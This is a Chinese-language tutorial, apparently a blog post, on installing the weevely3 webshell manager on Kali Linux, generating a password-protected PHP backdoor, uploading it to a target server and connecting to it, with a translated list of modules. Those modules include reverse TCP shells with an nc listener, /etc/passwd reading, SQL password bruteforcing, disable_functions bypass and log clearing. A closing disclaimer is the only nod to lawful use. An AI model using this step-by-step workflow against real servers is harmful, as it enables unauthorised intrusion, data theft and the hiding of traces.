2021Kali系列 -- linux菜刀(weevely3)

简介: 2021Kali系列 -- linux菜刀(weevely3)

简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。

一、下载地址(软件作者)

https://github.com/epinna/weevely3

二、安装使用

1、下载到本地

git clone https://github.com/epinna/weevely3.git

2、进入到weebely3目录

cd weebely3

3、安装需要的模块

pip3 install -r requirements.txt

4、启动weevely.py

./weevely.py

0a2653c851af460fa595bd959398a8f1.png

5、生成木马文件,在weebely3文件夹中会生成一个连接密码为123的shell.php

./weevely.py generate 123 shell.php

0eacb84100b54626af849e6b562bf92a.png 2d65d23f6d4748949b924e4057485923.png

6、上传shell文件到目标服务器

7、连接木马

./weevely.py http://192.168.139.129:81/shell.php 123

0a2653c851af460fa595bd959398a8f1.png

8、获取文件目录,dir

0eacb84100b54626af849e6b562bf92a.png

9、利用模块收集信息

WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname

2d65d23f6d4748949b924e4057485923.png

10、直接输入help,查看其它可利用模块

2e9b90b2ca334476abebe75bafe6eeaa.png

:shell_su                     通过更变使用者来执行shell命令,可以获得root权限来执行命令.                                            
:shell_sh                     执行 shell 命令.                                              
:shell_php                    执行 PHP 命令.                                                
:system_extensions            收集PHP和webserver扩展列表                           
:system_info                  收集系统信息                                          
:system_procs                 列出正在运行的进程                                              
:audit_disablefunctionbypass  使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell     
:audit_etcpasswd              查看/etc/passwd文件                           
:audit_suidsgid               查找带有SUID或SGID标志的文件。
:audit_phpconf                查看php配置信息                                             
:audit_filesystem             审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等                         
:backdoor_reversetcp          执行反向TCP shell. 需要nc -lvp <port>监听                                        
:backdoor_tcp                 在TCP端口上生成shell                                         
:net_scan                     TCP端口扫描.                                                       
:net_mail                     发送邮件.                                                           
:net_ifconfig                 获取网络接口地址.                                    
:net_curl                     执行类似curl的HTTP请求.                                    
:net_proxy                    运行本地代理以通过目标转移HTTP / HTTPS浏览
:net_phpproxy                 在目标上安装PHP代理.                                     
:bruteforce_sql               可用来猜解数据库密码.                                             
:file_find                    查找具有给定名称和属性的文件.                          
:file_download                从远程文件系统下载文件.                                
:file_check                   获取文件的属性和权限.                            
:file_touch                   更改文件时间戳.                                               
:file_cd                      更改当前工作目录.                                    
:file_grep                    打印与多个文件中的模式匹配的行.                    
:file_gzip                    压缩或解压gzip文件.                                       
:file_tar                     压缩或解压tar文件.                                     
:file_enum                    检查路径列表的存在和权限
:file_bzip2                   压缩或解压bzip2文件.                                      
:file_mount                   使用HTTPfs挂载远程文件系统.                                
:file_clearlog                从文件中删除字符串.                                           
:file_zip                     压缩或解压zip文件.                                        
:file_cp                      复制单个文件.                                                    
:file_upload2web              自动将文件上传到Web文件夹并获取相应的URL.
:file_edit                    在本地编辑器上编辑远程文件.                                  
:file_read                    从远程文件系统中读取远程文件.                         
:file_webdownload             指定URL下载文件.                                                     
:file_upload                  文件上载到远程文件系统.                                    
:file_ls                      列出目录内容.                                              
:file_rm                      删除远程文件.                                                  
:sql_dump                     Multi dbms mysqldump replacement.                                    
:sql_console                  执行SQL查询或运行sql控制台.

禁止非法,后果自负

目录
相关文章
|
4月前
|
Ubuntu Linux 虚拟化
2:发行版本安装演示——Ubuntu、CentOS、Kali?-步入Linux的现代方法
2:发行版本安装演示——Ubuntu、CentOS、Kali?-步入Linux的现代方法
71 0
|
6月前
|
安全 Linux 测试技术
【文末送书】Kali Linux与网络安全
【文末送书】Kali Linux与网络安全
125 0
|
7月前
|
Linux
KaLi Linux 安装sougou输入法
KaLi Linux 安装sougou输入法,操作在下方!!!
402 1
|
5月前
|
Linux Python
linux 安装 pip2 kali debian python python2
linux 安装 pip2 kali debian python python2
56 0
|
3月前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
162 0
|
4月前
|
安全 Linux 网络安全
深入探索:Kali Linux 网络安全之旅
"Kali" 可能指的是 Kali Linux,它是一种基于 Debian 的 Linux 发行版,专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。Kali Linux 旨在提供一系列用于测试网络和系统安全性的工具,以及为安全专业人员和爱好者提供一个强大的平台。
60 1
|
7月前
|
Linux Shell
linux/debian/kali 第三方切换路径工具
linux/debian/kali 第三方切换路径工具
57 0
|
7月前
|
Linux
kali/debian/snap-store debain/linux的软件商店下载
kali/debian/snap-store debain/linux的软件商店下载
103 0
|
7月前
|
Linux 网络安全 开发工具
kali/debain/linux包管理
kali/debain/linux包管理
102 0
|
7月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
254 0